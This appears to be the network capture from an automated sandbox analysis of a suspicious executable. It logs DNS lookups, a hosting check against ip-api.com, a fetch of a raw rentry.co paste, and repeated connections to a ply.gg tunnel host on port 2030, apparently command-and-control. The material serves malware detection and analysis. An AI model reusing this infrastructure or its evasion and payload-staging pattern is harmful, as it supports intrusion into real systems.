Nov 23, 2024 21:09:50.978945017 CET	443	49783	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:50.980150938 CET	49783	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:50.980168104 CET	443	49783	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:51.453188896 CET	443	49783	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:51.453406096 CET	443	49783	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:51.453499079 CET	443	49783	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:51.453520060 CET	49783	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:51.453557968 CET	443	49783	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:51.453604937 CET	49783	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:51.453622103 CET	443	49783	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:51.453742027 CET	443	49783	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:51.453803062 CET	49783	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:51.453830957 CET	443	49783	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:51.461102962 CET	443	49783	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:51.461194038 CET	49783	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:51.461229086 CET	443	49783	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:51.461255074 CET	443	49783	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:51.461401939 CET	49783	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:51.462866068 CET	49783	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:53.148202896 CET	49760	2030	192.168.2.8	147.185.221.19
Nov 23, 2024 21:09:53.274075985 CET	2030	49760	147.185.221.19	192.168.2.8
Nov 23, 2024 21:09:53.476396084 CET	49789	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:53.476454020 CET	443	49789	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:53.476531982 CET	49789	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:53.476999044 CET	49789	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:53.477015972 CET	443	49789	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:54.809667110 CET	443	49789	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:54.811044931 CET	49789	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:54.811079979 CET	443	49789	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:55.270620108 CET	443	49789	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:55.270822048 CET	443	49789	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:55.270900011 CET	49789	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:55.270915031 CET	443	49789	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:55.270946980 CET	443	49789	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:55.270992041 CET	49789	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:55.271035910 CET	443	49789	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:55.271195889 CET	443	49789	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:55.271248102 CET	49789	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:55.271259069 CET	443	49789	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:55.278862953 CET	443	49789	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:55.278943062 CET	49789	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:55.278950930 CET	443	49789	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:55.279036045 CET	443	49789	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:55.279087067 CET	49789	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:55.279247046 CET	49789	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:57.289253950 CET	49800	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:57.289385080 CET	443	49800	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:57.289460897 CET	49800	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:57.289736986 CET	49800	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:57.289773941 CET	443	49800	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:58.556200981 CET	443	49800	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:58.557449102 CET	49800	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:58.557532072 CET	443	49800	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:59.007940054 CET	443	49800	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:59.008193970 CET	443	49800	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:59.008286953 CET	49800	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:59.008292913 CET	443	49800	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:59.008323908 CET	443	49800	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:59.008368969 CET	49800	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:59.008414030 CET	443	49800	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:59.008579016 CET	443	49800	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:59.008630037 CET	49800	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:59.008645058 CET	443	49800	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:59.016290903 CET	443	49800	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:59.016396999 CET	49800	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:59.016407967 CET	443	49800	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:59.016431093 CET	443	49800	172.67.75.40	192.168.2.8
Nov 23, 2024 21:09:59.016479015 CET	49800	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:09:59.016865969 CET	49800	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:01.024044037 CET	49811	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:01.024102926 CET	443	49811	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:01.024194002 CET	49811	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:01.024499893 CET	49811	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:01.024516106 CET	443	49811	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:02.305592060 CET	443	49811	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:02.306813955 CET	49811	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:02.306833982 CET	443	49811	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:02.867499113 CET	443	49811	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:02.867579937 CET	443	49811	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:02.867607117 CET	443	49811	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:02.867640018 CET	49811	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:02.867650032 CET	443	49811	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:02.867683887 CET	49811	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:02.867688894 CET	443	49811	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:02.867741108 CET	443	49811	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:02.867769957 CET	49811	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:02.867774963 CET	443	49811	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:02.876076937 CET	443	49811	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:02.876178026 CET	49811	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:02.876185894 CET	443	49811	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:02.876502991 CET	49811	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:02.876540899 CET	443	49811	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:02.876581907 CET	49811	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:04.043524027 CET	2030	49760	147.185.221.19	192.168.2.8
Nov 23, 2024 21:10:04.043617010 CET	49760	2030	192.168.2.8	147.185.221.19
Nov 23, 2024 21:10:04.883409023 CET	49817	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:04.883464098 CET	443	49817	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:04.883534908 CET	49817	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:04.883812904 CET	49817	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:04.883822918 CET	443	49817	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:05.601361036 CET	49760	2030	192.168.2.8	147.185.221.19
Nov 23, 2024 21:10:05.603233099 CET	49821	2030	192.168.2.8	147.185.221.19
Nov 23, 2024 21:10:05.724381924 CET	2030	49760	147.185.221.19	192.168.2.8
Nov 23, 2024 21:10:05.724430084 CET	2030	49821	147.185.221.19	192.168.2.8
Nov 23, 2024 21:10:05.724541903 CET	49821	2030	192.168.2.8	147.185.221.19
Nov 23, 2024 21:10:05.756628036 CET	49821	2030	192.168.2.8	147.185.221.19
Nov 23, 2024 21:10:05.876137018 CET	2030	49821	147.185.221.19	192.168.2.8
Nov 23, 2024 21:10:06.196357012 CET	443	49817	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:06.196443081 CET	49817	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:06.198004961 CET	49817	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:06.198015928 CET	443	49817	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:06.198261023 CET	443	49817	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:06.199201107 CET	49817	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:06.243330002 CET	443	49817	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:06.735111952 CET	443	49817	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:06.735188007 CET	443	49817	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:06.735233068 CET	49817	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:06.735239983 CET	443	49817	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:06.735271931 CET	443	49817	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:06.735321045 CET	49817	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:06.848227978 CET	443	49817	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:06.854409933 CET	443	49817	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:06.854473114 CET	49817	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:06.854499102 CET	443	49817	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:06.897870064 CET	49817	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:06.967746019 CET	443	49817	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:06.967847109 CET	443	49817	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:06.967917919 CET	49817	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:06.968331099 CET	49817	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:08.976881981 CET	49829	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:08.976948023 CET	443	49829	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:08.977025032 CET	49829	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:08.977252960 CET	49829	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:08.977271080 CET	443	49829	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:10.241179943 CET	443	49829	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:10.242542028 CET	49829	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:10.242571115 CET	443	49829	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:10.758295059 CET	443	49829	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:10.758378983 CET	443	49829	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:10.758424044 CET	443	49829	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:10.758459091 CET	443	49829	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:10.758466959 CET	49829	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:10.758514881 CET	443	49829	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:10.758527994 CET	443	49829	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:10.758528948 CET	49829	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:10.758573055 CET	49829	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:10.766469002 CET	443	49829	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:10.766567945 CET	443	49829	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:10.766613007 CET	49829	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:10.766922951 CET	49829	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:10.766922951 CET	49829	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:12.774864912 CET	49839	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:12.774900913 CET	443	49839	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:12.774959087 CET	49839	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:12.775238991 CET	49839	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:12.775250912 CET	443	49839	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:14.036163092 CET	443	49839	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:14.085386992 CET	49839	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:15.380435944 CET	49839	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:15.380453110 CET	443	49839	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:15.382950068 CET	49821	2030	192.168.2.8	147.185.221.19
Nov 23, 2024 21:10:15.503427029 CET	2030	49821	147.185.221.19	192.168.2.8
Nov 23, 2024 21:10:15.739622116 CET	443	49839	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:15.739694118 CET	443	49839	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:15.739726067 CET	443	49839	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:15.739737034 CET	49839	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:15.739746094 CET	443	49839	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:15.739773035 CET	443	49839	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:15.739789009 CET	49839	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:15.739793062 CET	443	49839	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:15.739833117 CET	49839	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:15.739836931 CET	443	49839	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:15.747733116 CET	443	49839	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:15.747793913 CET	443	49839	172.67.75.40	192.168.2.8
Nov 23, 2024 21:10:15.747879028 CET	49839	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:15.747879028 CET	49839	443	192.168.2.8	172.67.75.40
Nov 23, 2024 21:10:15.748126030 CET	49839	443	192.168.2.8	172.67.75.40

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2024 21:08:13.545538902 CET	64877	53	192.168.2.8	1.1.1.1
Nov 23, 2024 21:08:13.682863951 CET	53	64877	1.1.1.1	192.168.2.8
Nov 23, 2024 21:09:18.154378891 CET	61069	53	192.168.2.8	1.1.1.1
Nov 23, 2024 21:09:18.399199963 CET	53	61069	1.1.1.1	192.168.2.8
Nov 23, 2024 21:09:18.509915113 CET	55756	53	192.168.2.8	1.1.1.1
Nov 23, 2024 21:09:18.752753019 CET	53	55756	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 23, 2024 21:08:13.545538902 CET	192.168.2.8	1.1.1.1	0x849c	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Nov 23, 2024 21:09:18.154378891 CET	192.168.2.8	1.1.1.1	0x4922	Standard query (0)	george-liechtenstein.gl.at.ply.gg	A (IP address)	IN (0x0001)	false
Nov 23, 2024 21:09:18.509915113 CET	192.168.2.8	1.1.1.1	0xb121	Standard query (0)	rentry.co	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 23, 2024 21:08:13.682863951 CET	1.1.1.1	192.168.2.8	0x849c	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
Nov 23, 2024 21:09:18.399199963 CET	1.1.1.1	192.168.2.8	0x4922	No error (0)	george-liechtenstein.gl.at.ply.gg	147.185.221.19	A (IP address)	IN (0x0001)	false
Nov 23, 2024 21:09:18.752753019 CET	1.1.1.1	192.168.2.8	0xb121	No error (0)	rentry.co	172.67.75.40	A (IP address)	IN (0x0001)	false
Nov 23, 2024 21:09:18.752753019 CET	1.1.1.1	192.168.2.8	0xb121	No error (0)	rentry.co	104.26.3.16	A (IP address)	IN (0x0001)	false
Nov 23, 2024 21:09:18.752753019 CET	1.1.1.1	192.168.2.8	0xb121	No error (0)	rentry.co	104.26.2.16	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

rentry.co

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49704	208.95.112.1	80	6848	C:\Users\user\Desktop\owuP726k3d.exe

Timestamp	Bytes transferred	Direction	Data
Nov 23, 2024 21:08:13.842112064 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Nov 23, 2024 21:08:15.098912001 CET	175	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 20:08:14 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49713	172.67.75.40	443	6848	C:\Users\user\Desktop\owuP726k3d.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 20:09:20 UTC	71	OUT	GET /8wum7vax/raw HTTP/1.1 Host: rentry.co Connection: Keep-Alive
2024-11-23 20:09:20 UTC	1279	IN	HTTP/1.1 403 Forbidden Date: Sat, 23 Nov 2024 20:09:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 8088 Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge
2024-11-23 20:09:20 UTC	886	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 38 30 4e 4f 72 6e 2b 59 61 56 46 2f 74 36 4e 57 37 4f 69 7a 5a 61 33 49 56 5a 64 63 41 42 4c 61 33 54 4a 35 6c 51 64 55 73 74 43 2f 74 58 2b 39 34 38 34 49 6d 69 47 72 77 79 53 56 76 30 2b 69 4e 51 55 7a 6a 46 6d 73 6b 31 75 72 35 64 69 70 31 77 6c 4c 57 4f 64 73 77 66 43 6f 6f 31 4f 53 6a 61 2f 2f 4f 37 66 70 37 56 41 54 64 4a 76 4c 79 58 30 69 72 55 5a 79 2f 4b 33 4a 74 4b 6d 44 38 5a 4c 33 37 39 58 65 68 4f 4a 35 39 47 41 74 43 74 79 66 36 41 3d 3d 24 53 78 69 51 34 43 4f 52 63 64 31 54 66 2f 72 65 73 66 31 6f 49 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 Data Ascii: cf-chl-out: 80NOrn+YaVF/t6NW7OizZa3IVZdcABLa3TJ5lQdUstC/tX+9484ImiGrwySVv0+iNQUzjFmsk1ur5dip1wlLWOdswfCoo1OSja//O7fp7VATdJvLyX0irUZy/K3JtKmD8ZL379XehOJ59GAtCtyf6A==$SxiQ4CORcd1Tf/resf1oIw==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
2024-11-23 20:09:20 UTC	573	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
2024-11-23 20:09:20 UTC	1369	IN	Data Raw: 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 7d 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 35 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 7d 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 Data Ascii: UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{font-size:1.5rem;font-weight:500
2024-11-23 20:09:20 UTC	1369	IN	Data Raw: 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 72 65 6e 74 72 79 2e 63 6f 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 52 61 79 3a 20 27 38 65 37 33 63 62 64 65 61 65 63 34 65 66 61 33 27 2c 63 48 3a 20 27 77 38 48 7a 5f 52 65 64 48 31 6a 36 76 45 43 77 57 70 72 6b 4c 39 53 70 47 43 30 79 6f 72 65 74 49 44 6b 39 68 67 4e 4e 42 62 73 2d 31 37 33 32 33 39 32 35 36 30 2d 31 2e 32 2e 31 2e 31 2d 6e 6c 53 65 51 61 6d 51 66 69 34 4a 74 2e 41 71 4d 41 47 33 59 43 6a 7a 4f 33 76 47 4d 6e 76 32 59 48 46 53 4a 6b 64 78 5a 53 30 32 6c 75 33 6e 39 73 Data Ascii: iv></noscript></div></div><script>(function(){window._cf_chl_opt={cvId: '3',cZone: "rentry.co",cType: 'managed',cRay: '8e73cbdeaec4efa3',cH: 'w8Hz_RedH1j6vECwWprkL9SpGC0yoretIDk9hgNNBbs-1732392560-1.2.1.1-nlSeQamQfi4Jt.AqMAG3YCjzO3vGMnv2YHFSJkdxZS02lu3n9s
2024-11-23 20:09:20 UTC	1369	IN	Data Raw: 69 43 78 77 67 5f 53 34 6e 7a 75 66 72 42 61 33 37 51 42 71 75 4e 7a 49 44 4f 4a 39 34 44 51 5a 77 43 51 34 67 78 68 6a 68 72 4d 31 32 73 2e 6a 30 63 67 49 43 46 67 33 78 4c 37 58 5f 68 47 51 31 69 57 73 71 71 68 5a 4e 47 79 39 76 5a 62 39 5a 65 43 54 6a 56 4b 5a 5a 6a 70 75 33 44 6a 46 6e 64 33 57 4f 47 6c 59 43 4c 4a 73 64 38 71 5f 33 43 50 74 4d 30 68 4d 33 4b 35 44 38 48 63 5a 31 69 79 71 69 59 48 4e 70 4f 4d 62 46 32 69 58 66 78 51 64 2e 35 52 66 4b 63 5a 61 2e 56 71 4c 30 55 59 6f 37 66 5f 5f 76 5f 47 74 4b 6a 54 44 4b 36 2e 59 57 66 43 4f 71 61 38 57 42 44 51 34 76 71 56 5a 4d 64 50 44 64 32 63 4e 42 70 4d 70 6f 4e 78 5f 2e 57 6a 6b 54 45 43 69 4b 73 39 61 4d 62 44 43 53 48 71 57 36 71 4e 55 50 75 30 4d 7a 38 4d 45 34 32 4d 50 34 37 46 62 6c 6c 32 Data Ascii: iCxwg_S4nzufrBa37QBquNzIDOJ94DQZwCQ4gxhjhrM12s.j0cgICFg3xL7X_hGQ1iWsqqhZNGy9vZb9ZeCTjVKZZjpu3DjFnd3WOGlYCLJsd8q_3CPtM0hM3K5D8HcZ1iyqiYHNpOMbF2iXfxQd.5RfKcZa.VqL0UYo7f__v_GtKjTDK6.YWfCOqa8WBDQ4vqVZMdPDd2cNBpMpoNx_.WjkTECiKs9aMbDCSHqW6qNUPu0Mz8ME42MP47Fbll2
2024-11-23 20:09:20 UTC	1369	IN	Data Raw: 4b 42 77 70 65 55 6b 45 72 5a 79 37 43 4e 69 32 4c 31 53 63 79 78 7a 34 6b 74 65 39 6b 79 42 74 65 78 4e 34 4b 71 31 53 44 73 6c 64 6f 78 52 6d 41 70 45 6d 4b 49 33 49 75 35 57 35 73 67 42 64 67 36 43 6b 6e 63 56 75 54 6a 7a 66 31 6e 63 7a 4c 46 77 2e 66 73 76 64 71 67 63 42 4d 6e 6a 33 76 71 54 58 57 75 58 4f 70 62 31 6a 37 42 32 32 37 32 52 6b 30 76 38 4c 54 48 34 73 4f 5f 44 79 4c 6a 33 50 73 67 6b 67 44 57 57 79 49 58 39 33 35 39 70 39 66 78 59 62 37 4b 73 74 32 68 6e 5a 41 59 37 6c 57 7a 4f 6d 35 4f 69 39 22 2c 6d 64 72 64 3a 20 22 49 44 4f 57 39 78 70 36 39 44 70 51 74 75 4e 54 37 61 74 4c 4f 6a 76 32 55 69 63 53 53 38 38 4c 61 6f 54 6d 52 67 50 31 6c 47 67 2d 31 37 33 32 33 39 32 35 36 30 2d 31 2e 32 2e 31 2e 31 2d 32 77 57 4e 70 45 74 56 4d 66 5a Data Ascii: 